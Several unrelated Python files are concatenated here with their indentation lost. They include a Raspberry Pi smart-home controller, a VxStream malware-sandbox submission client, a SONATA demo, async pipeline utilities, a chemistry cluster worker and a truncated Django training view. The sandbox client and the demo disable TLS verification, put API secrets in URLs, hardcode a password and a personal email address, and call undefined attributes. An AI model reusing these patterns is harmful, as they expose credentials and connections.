global waiting_room
global r_waiting_room
global employee_room
global bath_room
global check_mode
# Bluetooth Serial Variable
serialRead = ser.readline()
serialRead = serialRead.decode().strip()
# System Mode Check
if serialRead == "9":
sysMode = 1
LCD('SmartX', 'Automatic', 1)
elif serialRead == "0":
sysMode = 0
LCD('SmartX', 'Manual', 1)
# Automatic Mode
if sysMode == 0:
r_room(r_office, office, 'Office', 0)
r_room(r_kitchen, kitchen, 'Kitchen', 1)
r_room(r_meeting_room, meeting_room, 'Meeting Room', 2)
r_room(r_waiting_room, waiting_room, 'Waiting Room', 3)
check_mode = 0
# Manual Mode
elif sysMode == 1:
# Check The Light Status
if check_mode < 50:
m_check(waiting_room, b"D", b"d")
m_check(kitchen, b"G", b"g")
m_check(office, b"V", b"v")
m_check(bath_room, b"H", b"h")
m_check(employee_room, b"K", b"k")
m_check(meeting_room, b"F", b"f")
m_check(meeting_room, b"F\n", b"f\n")
check_mode = check_mode + 1
# Manual Mode Serial Check
m_room("1", "2", waiting_room, 'Waiting Room')
m_room("3", "4", kitchen, 'Kitchen')
m_room("5", "6", office, 'Office')
m_room("7", "8", bath_room, 'Bathroom')
m_room("e", "r", employee_room, 'Employee Room')
m_room("m", "t", meeting_room, 'Meeting Room')
# Smoke Thread
def smoke():
while True:
# Global Variables
global buzzer
# Get Smoke Status
if GPIO.input(SMOKE_IN) == False:
a.digitalWrite(buzzer, a.HIGH)
LCD('Kitchen', 'Smoke Detected', 2)
ser.write(b"S")
sleep(2)
a.digitalWrite(buzzer, a.LOW)
LCD('Kitchen', 'No Smoke Now', 2)
os.system('echo "SmartX detected smoke or gas in your apartment\nPlease be safe" | mail -s "Smoke or gas detected in your apartment" moksha.elghabaty@hotmail.com')
ser.write(b"s")
sleep(15)
os.system('echo "there is no smoke now in your apartment" | mail -s "No smoke or gas now in your apartment" moksha.elghabaty@hotmail.com')
else:
a.digitalWrite(buzzer, a.LOW)
sleep(2)
# Temprature Thread
def temp():
while True:
# Global Variables
global temp_STT
# Get The Temprature Vlaue
tempfile = open("/sys/bus/w1/devices/28-000002f53b3e/w1_slave")
thetext = tempfile.read()
tempfile.close()
tempdata = thetext.split("\n")[1].split(" ")[9]
temprature = float(tempdata[2:])
temprature = temprature / 1000
temprature = int(temprature)
#print temprature
if temprature > 30:
a.digitalWrite(fan, a.HIGH)
LCD('Control Center', 'Fan ON', 2)
ser.write(b"Z")
temp_STT = 0
else:
a.digitalWrite(fan, a.LOW)
if temp_STT < 1:
LCD('Control Center', 'Fan OFF', 2)
ser.write(b"z")
temp_STT = temp_STT + 1
# Motion Thread
def motion():
while True:
# Global Variables
global buzzer
global motion_STT
# Get Motion Value
GPIO.output(TRIG, True)
sleep(0.00001)
GPIO.output(TRIG, False)
start = time()
while GPIO.input(ECHO)==0:
start = time()
while GPIO.input(ECHO)==1:
stop = time()
elapsed = stop-start
distance = (elapsed * 34300)/2
sleep(0.5)
int_distance = int(distance)
if int_distance < 8:
a.digitalWrite(buzzer, a.HIGH)
LCD('Lane', 'Motion Detected', 2)
sleep(1)
ser.write(b"W")
motion_STT = 0
else:
a.digitalWrite(buzzer, a.LOW)
if motion_STT < 1:
LCD('Lane', 'No Motion Now', 2)
sleep(2)
ser.write(b"w")
motion_STT = motion_STT + 1
#LCD Print Thread
def LCD_print():
# LCD Welcome Screen
IP = ip_address()
LCD('SmartX', IP, 5)
while True:
if v_LCD [0] != None and v_LCD [1] != None and v_LCD [2] != None:
lcd_af.clear()
lcd_af.message(v_LCD [0] + '\n' + v_LCD [1])
sleep(v_LCD [2])
lcd_af.clear()
IP = ip_address()
lcd_af.message('SmartX' + '\n' + IP)
v_LCD [0] = None
v_LCD [1] = None
v_LCD [2] = None
else:
IP = ip_address()
lcd_af.message('SmartX' + '\n' + IP)
# Run The Threads
if __name__ == '__main__':
Thread(target = lights).start()
Thread(target = smoke).start()
Thread(target = temp).start()
Thread(target = motion).start()
Thread(target = LCD_print).start()
|
vxstreamlib.py
|
# vim: sw=4:ts=4:et
import gzip
import hashlib
import io
import json
import logging
import os.path
import re
import shutil
import smtplib
import sys
import tempfile
import threading
import time
import traceback
import warnings
import zipfile
from subprocess import Popen, PIPE
import requests
__all__ = [
'VXSTREAM_STATUS_UNKNOWN',
'VXSTREAM_STATUS_IN_QUEUE',
'VXSTREAM_STATUS_IN_PROGRESS',
'VXSTREAM_STATUS_ERROR',
'VXSTREAM_STATUS_SUCCESS',
'VxStreamServer',
'VxStreamSubmission',
'VXSTREAM_DOWNLOAD_JSON',
'VXSTREAM_DOWNLOAD_XML',
'VXSTREAM_DOWNLOAD_HTML',
'VXSTREAM_DOWNLOAD_SAMPLE',
'VXSTREAM_DOWNLOAD_PCAP',
'VXSTREAM_DOWNLOAD_MEMORY',
]
# default installation directory
VXSTREAM_BASE_DIR = '/opt/vxstream'
# sample submission status
VXSTREAM_STATUS_UNKNOWN = 'UNKNOWN'
VXSTREAM_STATUS_IN_QUEUE = 'IN_QUEUE'
VXSTREAM_STATUS_IN_PROGRESS = 'IN_PROGRESS'
VXSTREAM_STATUS_ERROR = 'ERROR'
VXSTREAM_STATUS_SUCCESS = 'SUCCESS'
# result types
VXSTREAM_DOWNLOAD_JSON = 'json'
VXSTREAM_DOWNLOAD_XML = 'xml'
VXSTREAM_DOWNLOAD_HTML = 'html'
VXSTREAM_DOWNLOAD_SAMPLE = 'bin'
VXSTREAM_DOWNLOAD_PCAP = 'pcap'
VXSTREAM_DOWNLOAD_MEMORY = 'memory'
# for extrating file paths from 7z command
REGEX_7Z = re.compile('^Extracting\s+(.+)$')
# required user-agent settings
VXSTREAM_HEADERS = { 'User-agent': 'VxStream Sandbox' }
# some symbolic names for indexes
class VxStreamDownloadResults(object):
def __init__(self, submission):
self.submission = submission
self.json_path = None
self.pcap_path = None
self.xml_path = None
self.html_path = None
self.dropped_files = []
self.memory_dump_files = []
self.combined_memory_dump_path = None
#def all_files(self):
#"""Returns a list of all files collected from the vxstream analysis."""
#result = []
#for file_path in [
#self.json_path,
#self.pcap_path,
#self.xml_path,
#self.html_path ]:
#if file_path is not None:
#result.append(file_path)
#result.extend(self.dropped_files)
#result.extend(self.memory_dump_files)
#if self.combined_memory_dump_path is not None:
#result.append(self.combined_memory_dump_path)
#return result
class VxStreamSubmission(object):
"""Represents a sample that was submitted to VxStream."""
def __init__(self, file_name, sha256, environment_id):
self.file_name = file_name
self.sha256 = sha256
self.environment_id = environment_id
self.status = None
def __str__(self):
return self.file_name
class VxStreamSubmissionManager(object):
"""Utility class that manages multiple submissions with notification callbacks."""
def __init__(self, server, submissions, delay=1):
assert isinstance(server, VxStreamServer)
assert delay >= 1
assert len(submissions) > 0
self.server = server
self.submissions = {} # key = sha256, value = VxStreamSubmission
self.callbacks = [] # a list of functions to call when the status of a sample has changed
# how often to check sample status
self.delay = delay
# controls the thread
self.shutdown = False
for submission in submissions:
self.submissions[submission.sha256] = submission
def add_callback(self, callback):
"""Adds a function(server, status) to be called when the status of a sample has changed."""
self.callbacks.append(callback)
def start(self):
self.thread = threading.Thread(target=self.run, name=str(type(self)))
self.thread.daemon = True
self.thread.start()
def stop(self):
self.shutdown = True
if self.thread is not None and self.thread.is_alive():
logging.debug("stopping {}".format(self.thread))
self.thread.join(self.delay + 2) # give it two seconds to stop
if self.thread.is_alive():
logging.error("{} failed to stop".format(self.thread))
def run(self):
while not self.shutdown:
try:
self.execute()
except Exception as e:
logging.error(str(e))
traceback.print_exc()
time.sleep(1)
def execute(self):
completed = [] # list of submissions that have completed
for submission in self.submissions.values():
result = server.get_status(submission.sha256, submission.environment_id)
if result == VXSTREAM_STATUS_ERROR:
logging.info("detected error in file {}".format(submission))
completed.append(submission)
elif result == VXSTREAM_STATUS_SUCCESS:
logging.info("detected completed file {}".format(submission))
completed.append(submission)
if submission.status != result:
logging.info("sample {} changed state from {} to {}".format(submission, submission.status, result))
submission.status = result
# call all notifications for this sample
for callback in self.callbacks:
try:
callback(self.server, submission)
except Exception as e:
logging.error("error executing {}: {}".format(str(callback), str(e)))
for submission in completed:
del self.submissions[submission.sha256]
if len(self.submissions) == 0:
logging.info("finished all submissions")
self.shutdown = True
def wait(self):
"""Waits for all submitted jobs to complete."""
logging.info("waiting for {} jobs to complete".format(len(self.submissions)))
while not self.shutdown:
time.sleep(1)
class VxStreamServer(object):
def __init__(self, url, api_key, secret, proxies={}):
# set this to True to shut down any outstanding requests
self.shutdown = False
# base vxstream url
self.url = url
while self.url.endswith('/'):
self.url = self.url[:-1]
# various URLs we use
#self.submit_url = '{}/submit'.format(self.url)
#self.result_url = '{}/result'.format(self.url)
#self.state_url = '{}/state'.format(self.url)
self.api_key = api_key
self.secret = secret
# how long do we wait in between status requests? (in seconds)
self.query_frequency = 1
# optional proxy settings
self.proxies = proxies
def get_status(self, sha256, environment_id):
status_url = '{}/api/state/{}'.format(
self.url,
self.get_sample_url(sha256, environment_id))
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = requests.get(status_url, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
if result.status_code != 200:
logging.error("got result {} from vxstream: {}".format(result.status_code, result.reason))
return None
# the result looks like this
# '{\n "response_code": 0,\n "response": {\n "state": "SUCCESS"\n }\n}'
json_result = json.loads(result.text)
logging.debug("got response_code {} state {} for sha256 {} environment_id {}".format(
json_result['response_code'],
json_result['response']['state'],
sha256,
environment_id))
return json_result['response']['state']
def get_sample_url(self, sha256, environment_id):
return '{}/?apikey={}&secret={}&environmentId={}'.format(
sha256, self.api_key, self.secret, environment_id)
def result_url(self, result_type):
return '{}/result/{}&type={}'.format(self.state_url, self.get_url(), result_type)
def reanalyze(self, file_path, environment_id):
data = {
'apikey': self.api_key,
'secret': self.secret,
'environmentId': environment_id }
hasher = hashlib.sha256()
with open(file_path, 'rb') as fp:
while True:
data = fp.read(io.DEFAULT_BUFFER_SIZE)
if data == b'':
break
hasher.update(data)
sha256 = hasher.hexdigest()
url = '{}/api/reanalyze/{}'.format(self.url, sha256)
result = requests.post(url, data=data, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
logging.debug("got response_code {} for {}".format(result.status_code, url))
if result.status_code != 200:
logging.error("error code {} ({}) returned for {}".format(result.status_code, result.reason, sha256))
return None
status = self.get_status(sha256, environment_id)
logging.debug("got status {} for {}".format(status, sha256))
result = VxStreamSubmission(file_path, sha256, environment_id)
result.status = status
return result
def submit(self, file_path, environment_id):
# make sure we haven't already submitted this, eh?
hasher = hashlib.sha256()
with open(file_path, 'rb') as fp:
while True:
data = fp.read(io.DEFAULT_BUFFER_SIZE)
if data == b'':
break
hasher.update(data)
sha256 = hasher.hexdigest()
status = self.get_status(sha256, environment_id)
if status != VXSTREAM_STATUS_UNKNOWN:
logging.info("{} already uploaded".format(file_path))
result = VxStreamSubmission(file_path, sha256, environment_id)
result.status = status
return result
with open(file_path, 'rb') as fp_binary:
# submit the file to vxstream
files = { 'file': fp_binary }
data = {
'apikey': self.api_key,
'secret': self.secret,
'environmentId': environment_id }
submit_url = '{}/api/submit'.format(self.url)
logging.info("submitting {} to {} environment {}".format(file_path, submit_url, environment_id))
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = requests.post(submit_url, data=data, files=files, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
if result.status_code != 200:
logging.error("error code {} ({}) returned for {}".format(result.status_code, result.reason, file_path))
return None
return VxStreamSubmission(file_path, sha256, environment_id)
def wait(self, sha256, environment_id):
current_status = None
while not self.shutdown:
status = self.get_status(sha256, environment_id)
if current_status != status:
logging.info("{} status changed to {}".format(sha256, status))
current_status = status
if status == VXSTREAM_STATUS_ERROR:
logging.info("detected error state for {}".format(sha256))
return VXSTREAM_STATUS_ERROR
if status == VXSTREAM_STATUS_SUCCESS:
logging.info("{} completed".format(sha256))
return VXSTREAM_STATUS_SUCCESS
time.sleep(self.query_frequency)
def download(self, sha256, environment_id, _type, path):
download_url = '{}/api/result/{}&type={}'.format(
self.url,
self.get_sample_url(sha256, environment_id),
_type)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
logging.info("downloading {} for {} env {}".format(_type, sha256, environment_id))
result = requests.get(download_url, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
if result.status_code != 200:
logging.error("got result {} from vxstream: {}".format(result.status_code, result.reason))
return None
with open(path, 'wb') as fp:
for block in result.iter_content(io.DEFAULT_BUFFER_SIZE):
fp.write(block)
return path
def download_dropped_files(self, sha256, environment_id, target_dir):
"""Downloads the dropped files for this sample into target_dir. Returns the list of files extracted."""
download_url = '{}/api/sample-dropped-files/{}?environmentId={}&apikey={}&secret={}'.format(
self.url,
sha256,
environment_id,
self.api_key,
self.secret)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
logging.info("downloading dropped files from {}".format(download_url))
result = requests.get(download_url, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
if result.status_code != 200:
logging.error("got result {} from vxstream for {}: {}".format(result.status_code, download_url, result.reason))
return None
# put what we download into a temporary directory
temp_dir = tempfile.mkdtemp()
try:
# all dropped files come in a zip file
compressed_path = os.path.join(temp_dir, 'download.zip')
# write zip file to disk
with open(compressed_path, 'wb') as fp:
for block in result.iter_content(io.DEFAULT_BUFFER_SIZE):
fp.write(block)
# unzip without paths
p = Popen(['7z', 'e', '-y', '-o{}'.format(target_dir), compressed_path], stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
try:
os.remove(compressed_path)
except Exception as e:
logging.error("unable to delete {}: {}".format(compressed_path, e))
# list gz files in drop_path
file_list = [os.path.join(target_dir, f) for f in os.listdir(target_dir) if f.endswith('.gz')]
result = []
for compressed_path in file_list:
# there are some other files in here sometimes that we'll ignore
# we just want the dropped file
if '.DROPPED.' not in compressed_path:
continue
DROPPED_FILE_REGEX = re.compile(r'^(.+?)\.[0-9]+\.DROPPED\.gz')
# the file paths look like this
# dropped/78QC7UOHAWCI47906LWH.temp.4212842214.DROPPED.gZ
m = DROPPED_FILE_REGEX.match(os.path.basename(compressed_path))
if not m:
logging.error("could not extract file name from {}".format(compressed_path))
continue
target_path = os.path.join(target_dir, m.group(1))
result.append(target_path)
with gzip.open(compressed_path) as fp:
logging.debug("decompressing {}".format(compressed_path))
with open(target_path, 'wb') as dest_fp:
while True:
data = fp.read(io.DEFAULT_BUFFER_SIZE)
if data == b'':
break
dest_fp.write(data)
os.remove(compressed_path)
return result
finally:
try:
if temp_dir:
shutil.rmtree(temp_dir)
except Exception as e:
logging.error("unable to delete temporary directory {}: {}".format(temp_dir, e))
def download_memory_dump(self, sha256, environment_id, dest_dir):
"""Downloads the given memory dump into the given directory. Returns a tuple of a list of files extracted from what was downloaded, and the path to the combined memory dump."""
dest_path = os.path.join(dest_dir, 'memory.zip')
if self.download(sha256, environment_id, VXSTREAM_DOWNLOAD_MEMORY, dest_path) is None:
return None
with open(dest_path, 'rb') as fp:
blob = fp.read(1024)
if b'No dump files available' in blob:
logging.debug("memory dump not available for {} env {}".format(sha256, environment_id))
return None
logging.debug("extracting memory dump {} into {}".format(dest_path, dest_dir))
p = Popen(['7z', 'x', '-y', '-o{}'.format(dest_dir), dest_path], stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
file_list = []
for file_path in [os.path.join(dest_dir, f) for f in os.listdir(dest_dir) if f != "memory.zip"]:
file_list.append(file_path)
# concatenate all these files into one file
dest_path = os.path.join(dest_dir, 'memory.combined.mdmp')
for file_path in file_list:
logging.debug("concatenating {}".format(file_path))
with open(file_path, 'rb') as input_fp:
with open(dest_path, 'ab') as output_fp:
while True:
data = input_fp.read(io.DEFAULT_BUFFER_SIZE)
if data == b'':
break
output_fp.write(data)
return file_list, dest_path
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description="Submit one or more files to vxstream for processing.")
parser.add_argument('files', nargs="*", help="Zero or more files to submit. Also see --from-stdin")
parser.add_argument('--from-stdin', required=False, default=False, action='store_true', dest='from_stdin',
help="Read the files to scan from standard input.")
parser.add_argument('--sha256', required=False, default=None, dest='sha256',
help="Download the results of the given sha256 hash.")
parser.add_argument('--environment_id', required=False, default='3', dest='environment_id',
help="Select the environment ID to use.")
parser.add_argument('-u', '--url', required=False, default='https://vxstream.local', dest='url',
help="The URI to submit the files to.")
parser.add_argument('-d', '--dir', required=False, default='vxstream.out', dest='output_dir',
help="The output directory to place the downloaded results into.")
parser.add_argument('-l', '--log-level', required=False, default='WARNING', dest='log_level',
help="The logging level to use for log events.")
#parser.add_argument('--decompress', required=False, default=False, action='store_true', dest='decompress',
#help="Automatically decompress and extract dropped files and memory dumps.")
#parser.add_argument('--download-html', required=False, default=False, action='store_true', dest='download_html',
#help="Also download the HTML report.")
#parser.add_argument('--download-xml', required=False, default=False, action='store_true', dest='download_xml',
#help="Also download the XML report.")
#parser.add_argument('--download-dropped-files', required=False, default=False, action='store_true', dest='download_dropped_files',
#help="Also download the dropped files.")
parser.add_argument('-e', '--email', required=False, action='append', default=[], dest='email_addresses',
help="Send an email when completed. Can specify more than one of these options.")
parser.add_argument('--smtp-server', required=False, default='ashsmtp.asco.ashland.com', dest='smtp_server',
help="Specify an alternate SMTP server to use.")
parser.add_argument('--api-key', required=False, default='', dest='api_key')
parser.add_argument('--secret', required=False, default='', dest='secret')
parser.add_argument('--delay', required=False, default=1, type=int, dest='delay',
help="The number of seconds to delay in between each attempt to query status of submitted files.")
parser.add_argument('--split-memory-dump', required=False, default=False, action='store_true', dest='split_memory',
help="Download the memory dump as separate files instead of an individual file.")
args = parser.parse_args()
logging.basicConfig(level=args.log_level, format='[%(asctime)s] [%(levelname)s] - %(message)s')
logging.getLogger("requests").setLevel(logging.WARNING)
if not os.path.isdir(args.output_dir):
try:
os.makedirs(args.output_dir)
except Exception as e:
logging.error("unable to create output directory {}: {}".format(args.output_dir, str(e)))
sys.exit(1)
server = VxStreamServer(args.url, args.api_key, args.secret)
submissions = [] # list of VxStreamSubmission objects we will be tracking
if args.sha256 is not None:
submissions.append(VxStreamSubmission('(unknown)', args.sha256, args.environment_id))
else:
# are we reading list of files from command line or stdin?
file_list = args.files
if args.from_stdin:
file_list = sys.stdin
for f in file_list:
# files from stdin will have trailing return
if args.from_stdin:
f = f.strip()
submission = server.submit(f, args.environment_id)
if submission is None:
continue
submissions.append(submission)
if len(submissions) == 0:
logging.error("no files were submitted")
sys.exit(1)
def state_change_handler(server, submission):
if submission.status == VXSTREAM_STATUS_SUCCESS:
result = server.download_results(submission, args.output_dir)
for file_path in [
result.json_path,
result.pcap_path,
result.xml_path,
result.html_path ]:
if file_path is not None:
print(file_path)
for file_path in result.dropped_files:
print(file_path)
if args.split_memory:
for file_path in result.memory_dump_files:
print(file_path)
else:
if result.combined_memory_dump_path is not None:
print(result.combined_memory_dump_path)
symlink_path = os.path.join(args.output_dir, os.path.basename(submission.file_name))
if not os.path.lexists(symlink_path):
try:
os.symlink(os.path.basename(os.path.dirname(result.json_path)), symlink_path)
except Exception as e:
logging.error("unable to create symlink {}: {}".format(symlink_path, str(e)))
manager = VxStreamSubmissionManager(server, submissions, delay=args.delay)
manager.add_callback(state_change_handler)
manager.start()
manager.wait()
|
demo.py
|
# Copyright (c) 2015 SONATA-NFV, UBIWHERE, i2CAT,
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, UBIWHERE, i2CAT
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
"""
PORTO F2F Meeting short demo on features:
- Access token
- Push package function
"""
import os
import sys; print('Python %s on %s' % (sys.version, sys.platform))
import time
import requests
from multiprocessing import Process
from son.access.utils.mock import main as mocked
# dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..'))
# sys.path.extend([str(dir)])
class mcolors:
OKGREEN = '\033[92m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def disable(self):
self.OKGREEN = ''
self.FAIL = ''
self.ENDC = ''
def main():
print("\n")
print("=== ", mcolors.OKGREEN + "SON-ACCESS AUTHENTICATION ", mcolors.ENDC + "===\n")
print(mcolors.OKGREEN + "Logging in with USERNAME: tester\n", mcolors.ENDC)
url = "http://0.0.0.0:5001/login"
# Construct the POST request
form_data = {
'username': 'tester',
'password': '1234'
}
response = requests.post(url, data=form_data, verify=False)
print("Access Token received: ", mcolors.OKGREEN + response.text + "\n", mcolors.ENDC)
time.sleep(3)
print("=== ", mcolors.OKGREEN + "SON-ACCESS PUSH SON-PACKAGE ", mcolors.ENDC + "===\n")
mode = "push"
url = "http://sp.int3.sonata-nfv.eu:32001"
pkg = "samples/sonata-demo.son"
# Push son-package to the Service Platform
command = "sudo python %s.py -U %s" % (mode, pkg)
print("Calling: ", mcolors.OKGREEN + command + "\n", mcolors.ENDC)
result = os.popen(command).read()
print("Response: ", mcolors.OKGREEN + result + "\n", mcolors.ENDC)
time.sleep(3)
# Get son-packages list from the Service Platform to check submitted son-package
mode = "pull"
command = "sudo python %s.py --list_packages" % mode
print("Calling: ", mcolors.OKGREEN + command + "\n", mcolors.ENDC)
result = os.popen(command).read()
print("Response: ", mcolors.OKGREEN + result + "\n", mcolors.ENDC)
processes = []
# Run fake user management module
print(mcolors.FAIL + "Starting 'fake' User Management module", mcolors.ENDC)
p = Process(target=mocked,)
time.sleep(0.5)
p.start()
processes.append(p)
time.sleep(3)
# Run demo main process
p = Process(target=main,)
p.start()
processes.append(p)
time.sleep(1)
try:
for process in processes:
process.join()
except KeyboardInterrupt:
print("Keyboard interrupt in main")
except Exception as e:
print("ERROR: ", e)
finally:
print("Cleaning up Main")
|
utils.py
|
import asyncio
from collections import namedtuple
from queue import Empty, Full, Queue
from threading import Lock, Thread
from pypeln import utils as pypeln_utils
import time
LOOP = asyncio.new_event_loop()
def run_on_loop(f_coro):
if not LOOP.is_running():
def run():
LOOP.run_forever()
thread = Thread(target=run)
thread.daemon = True
thread.start()
LOOP.call_soon_threadsafe(lambda: LOOP.create_task(f_coro()))
def get_namespace():
return pypeln_utils.Namespace()
class TaskPool(object):
def __init__(self, workers):
self.semaphore = asyncio.Semaphore(workers)
self.tasks = set()
self.closed = False
async def put(self, coro):
if self.closed:
raise RuntimeError("Trying put items into a closed TaskPool")
await self.semaphore.acquire()
task = asyncio.create_task(coro)
self.tasks.add(task)
task.add_done_callback(self.on_task_done)
def on_task_done(self, task):
self.tasks.remove(task)
self.semaphore.release()
async def join(self):
await asyncio.gather(*self.tasks)
self.closed = True
async def __aenter__(self):
return self
def __aexit__(self, exc_type, exc, tb):
return self.join()
class IterableQueue(asyncio.Queue):
def __init__(self, maxsize, total_done, pipeline_namespace, loop, **kwargs):
super().__init__(maxsize=maxsize, loop=loop, **kwargs)
self.remaining = total_done
self.pipeline_namespace = pipeline_namespace
async def __aiter__(self):
while not self.is_done():
x = await self.get()
if self.pipeline_namespace.error:
return
if not pypeln_utils.is_continue(x):
yield x
def __iter__(self):
while not self.is_done():
if self.pipeline_namespace.error:
return
if self.empty():
time.sleep(pypeln_utils.TIMEOUT)
else:
x = self.get_nowait()
if not pypeln_utils.is_continue(x):
yield x
async def get(self):
x = await super().get()
if pypeln_utils.is_done(x):
self.remaining -= 1
return pypeln_utils.CONTINUE
return x
def get_nowait(self):
x = super().get_nowait()
if pypeln_utils.is_done(x):
self.remaining -= 1
return pypeln_utils.CONTINUE
return x
def is_done(self):
return self.remaining == 0 # and self.empty()
async def done(self):
await self.put(pypeln_utils.DONE)
def done_nowait(self):
self.put_nowait(pypeln_utils.DONE)
class MultiQueue(list):
async def put(self, x):
for queue in self:
await queue.put(x)
async def done(self):
for queue in self:
await queue.put(pypeln_utils.DONE)
async def __aenter__(self):
return self
def __aexit__(self, exc_type, exc, tb):
return self.done()
class StageStatus(object):
def __init__(self):
pass
@property
def done(self):
return True
@property
def active_workers(self):
return 0
def __str__(self):
return "StageStatus(done = {done}, active_workers = {active_workers})".format(
done=self.done, active_workers=self.active_workers,
)
WorkerInfo = namedtuple("WorkerInfo", ["index"])
class StageReuseError(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
|
cluster_fireball.py
|
import os
import time
from multiprocessing import Pool, Process
import pychemia
from pychemia.utils.serializer import generic_serializer
__author__ = 'Guillermo Avendano-Franco'
def cluster_fb_worker(db_settings):
while True:
pcdb = pychemia.db.get_database(db_settings)
population = pychemia.population.LJCluster(pcdb)
entry = population.pcdb.db.pychemia_entries.find_one({'status.' + population.tag: True,
'status.lock': {'$exists': False},
'properties': {}}, {'_id': 1})
if entry is not None:
population.pcdb.lock(entry['_id'])
structure = population.pcdb.get_structure(entry['_id'])
fb = pychemia.code.fireball.FireBall(fdata_path='../Fdata')
fb.initialize(structure, workdir=str(entry['_id']))
fb.cluster_relaxation()
fb.set_inputs()
sp = fb.run()
sp.wait()
so = pychemia.code.fireball.read_fireball_stdout(fb.workdir + os.sep + 'fireball.log')
forces = generic_serializer(so['forces'][-1])
energy = so['energy'][-1]['ETOT']
properties = {'forces': forces, 'energy': energy}
structure = pychemia.code.fireball.read_geometry_bas(fb.workdir + os.sep + 'answer.bas')
population.pcdb.update(entry['_id'], structure=structure, properties=properties)
population.pcdb.unlock(entry['_id'])
else:
break
def cluster_fb_evaluator(db_settings, nparal):
pcdb = pychemia.db.get_database(db_settings)
population = pychemia.population.LJCluster(pcdb)
print('Staring evaluator for ', population.name)
while True:
entry = population.pcdb.db.pychemia_entries.find_one({'status.' + population.tag: True,
'status.lock': {'$exists': False},
'properties': {}}, {'_id': 1})
if entry is None:
time.sleep(2)
create_pool = False
else:
create_pool = True
if create_pool:
pool = Pool(processes=nparal)
pool.map(cluster_fb_worker, nparal * [db_settings])
pool.close()
pool.join()
def cluster_fb_launcher(db_settings, nparal):
p = Process(target=cluster_fb_evaluator, args=(db_settings, nparal))
p.start()
return p
|
training.py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.conf import settings
from rest_framework import permissions
from rest_framework.views import APIView
from rest_framework.response import Response
from django.views.decorators.csrf import csrf_exempt
# from rest_framework.decorators import api_view,renderer_classes,
from django.http import JsonResponse
from django.views.decorators.http import require_POST
from rest_framework.decorators import api_view,schema
import pandas as pd
import numpy as np
from sklearn.externals import joblib
from django.utils.encoding import smart_str
import os,ast, signal,operator,requests, json,time,datetime
from string import ascii_uppercase
from random import choice
from multiprocessing import Process, Lock
global DATA_MEMORY_OBJS_SKLEARN
import ast,pathlib
# RUNNING_TASK_MEMORY=[]
from utility.utilityClass import RUNNING_TASK_MEMORY
DATA_MEMORY_OBJS_SKLEARN={}
from trainModel import kerasUtilities,mergeTrainingNN,autoMLutilities,trainAutoMLV2,trainMaskRCNN
kerasUtilities = kerasUtilities.KerasUtilities()
autoMLutilities = autoMLutilities.AutoMLUtilities()
# from SwaggerSchema.schemas import (autoMLsendDataSwagger,
# autoMLtrainModelSwagger,
# statusOfModelSwagger,
# trainNeuralNetworkModelsSwagger,
# )
settingFilePath='settingFiles/'
pathOfStatus='resultStatus/'
SavedModels='SavedModels/'
logFolder='logs/'
runPorts=range(6006,6026)
runPortsUsage='inactive'
tensorboardPort=pd.DataFrame(data={'runPorts':runPorts,'runPortsUsage':runPortsUsage,'usedForLogs':None})
tensorboardPort.to_csv(settingFilePath+'tensorboardPort.txt',index=False)
runPorts=range(8888,8891)
runPortsUsage='inactive'
jupyterNotebook=pd.DataFrame(data={'runPorts':runPorts,'runPortsUsage':runPortsUsage,'usedForLogs':None})
jupyterNotebook.to_csv(settingFilePath+'jupyterNotebook.txt',index=False)
class Training:
# @csrf_exempt
# @api_view(['POST'])
# @schema(trainNeuralNetworkModelsSwagger)
# @api_view()
def trainNeuralNetworkModels(requests):
def getValueFromReq(keyVal,bodyVal):
# print ('requests',requests.body)
try:
# print (requests.POST.get(keyVal))
return bodyVal[keyVal]
except:
return ''
# pmmlFile=requests.POST.get('filePath')
bodyVal=json.loads(requests.body)
# print ('came heer 2nd',bodyVal)
pmmlFile=getValueFromReq('filePath',bodyVal)
tensorboardUrl=getValueFromReq('tensorboardUrl',bodyVal)
tensorboardLogFolder=getValueFromReq('tensorboardLogFolder',bodyVal)
hyperParaUser={}
hyperParaUser['batchSize']=getValueFromReq('batchSize',bodyVal)
hyperParaUser['optimizer']=getValueFromReq('optimizer',bodyVal)
hyperParaUser['loss']=getValueFromReq('loss',bodyVal)
hyperParaUser['metrics']=getValueFromReq('metrics',bodyVal)
hyperParaUser['epoch']=getValueFromReq('epoch',bodyVal)
hyperParaUser['problemType']=getValueFromReq('problemType',bodyVal)
hyperParaUser['testSize']=getValueFromReq('testSize',bodyVal)
hyperParaUser['learningRate']=getValueFromReq('learningRate',bodyVal)
# hyperParaUser['']=getValueFromReq('',requests)
# hyperParaUser['']=getValueFromReq('',requests)
# print ('>>>>>>>>PPPPPPPPPPPPPPPP ',pmmlFile,tensorboardUrl,tensorboardLogFolder,hyperParaUser)
idforData=int(time.time())
idforData=str(idforData)+'_NN'
saveStatus=logFolder+idforData+'/'
kerasUtilities.checkCreatePath(saveStatus)
statusfileLocation=saveStatus+'status.txt'
data_details={}
data_details['tensorboardUrl']=tensorboardUrl
